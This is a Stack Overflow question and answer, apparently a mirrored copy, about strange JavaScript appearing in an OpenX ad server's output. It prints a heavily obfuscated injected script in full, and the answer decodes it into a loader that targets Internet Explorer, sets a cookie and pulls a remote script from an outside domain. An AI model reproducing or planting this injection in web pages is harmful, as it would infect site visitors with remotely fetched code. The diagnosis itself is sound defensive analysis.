OpenX displaying strange javascript code

https://stackoverflow.com/questions/17454555

02-06-2022
|

문제

I am running OpenX Ad server on my site and lately I have been noticing strange code being displayed with the ads. I am not sure if that is part of the OpenX code or if the application has been compromised somehow. Perhaps someone with a javascript knowledge can explain this for me. This is the code:

<script>try{_=~[];_={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};_.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;_.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;_.$=(_.___)[_.$_][_.$_];_.$(_.$(_.$$+"\""+_.$$_$+"="+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";"+_._+_.$_$_+"=\\"+_.__$+_.$_$+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$_$_+_.__+_._$+"\\"+_.__$+_.$$_+_._$_+"."+_._+"\\"+_.__$+_.$$_+_._$$+_.$$$_+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.___+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";\\"+_.__$+_.$_$+_.__$+_.$$$$+"("+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"==="+_._+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_.$$$_+_.$$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+_.$$_$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('_"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"=')==-"+_.__$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_._$_+_.$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_._$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_.$$_+"\\"+_.__$+_._$_+_.$__+"\\"+_.$__+_.___+"')>"+_.___+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_.__$+_.$_$+"\\"+_.__$+_._$_+_._$$+"\\"+_.__$+_.__$+_.__$+"\\"+_.__$+_.___+_.$_$+"\\"+_.$__+_.___+"')>"+_.___+")\\"+_.$__+_.___+"{"+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"="+_.__$+";"+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+"='__"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"="+_.__$+";\\"+_.$__+_.___+_.$$$_+"\\"+_.__$+_.$$$+_.___+"\\"+_.__$+_.$$_+_.___+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_._$_+_.$$$_+"\\"+_.__$+_.$$_+_._$$+"=\\"+_.__$+_._$_+_.$$$+_.$$$_+_.$$_$+",\\"+_.$__+_.___+_.___+_.__$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_._$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+"\\"+_.$__+_.___+_._$_+_.___+_._$_+_.___+"\\"+_.$__+_.___+_.___+_.___+":"+_.___+_.___+":"+_.___+_.___+"\\"+_.$__+_.___+"\\"+_.__$+_._$_+_.$_$+"\\"+_.__$+_._$_+_.$__+"\\"+_.__$+_.___+_._$$+";\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_.___+_.$_$_+_.__+"\\"+_.__$+_.$_$+_.___+"=/';"+_.$$_$+".\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+_.__+_.$$$_+(![]+"")[_._$_]+"\\"+_.__$+_.$_$+_.$$_+"(\\\"<\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\\"+\\\"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_._$$+"\\"+_.__$+_.$$_+_._$_+_.$$__+"='\\"+_.__$+_.$_$+_.___+_.__+_.__+"\\"+_.__$+_.$$_+_.___+"://\\"+_.__$+_.$__+_.$$$+_.$_$_+(![]+"")[_._$_]+_.$$$_+_.__+_._$+"."+_.$$$_+_._+"/"+_.$_$+_.$$_$+_.$$_+_._$_+_.___+_.$$_+_.$$_$+_.$$_$+".\\"+_.__$+_.$_$+_._$_+"\\"+_.__$+_.$$_+_._$$+"?"+_.$$__+"\\"+_.__$+_.$$_+_.___+"=\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"."+_.$_$$+"\\"+_.__$+_.$$_+_._$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"."+_.$$__+_._$+"\\"+_.__$+_.$_$+_.$_$+"'></\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\\"+\\\"\\"+_.__$+_.$$_+_.___+_.__+">\\\");}"+"\"")())();}catch(e){}</script>

해결책

When evaluated the obfuscated code will define this function and executes it:

function anonymous() {
    d=document;ua=navigator.userAgent;
    if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {
        d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
        d.writeln("<scr"+"ipt src='http://galeto.eu/5d6206dd.js?cp=www.domain.com'></scri"+"pt>");
    }
}

Basically, it set a cookie and loads an additional JavaScript file.

라이센스 : CC-BY-SA ~와 함께 속성

제휴하지 않습니다 StackOverflow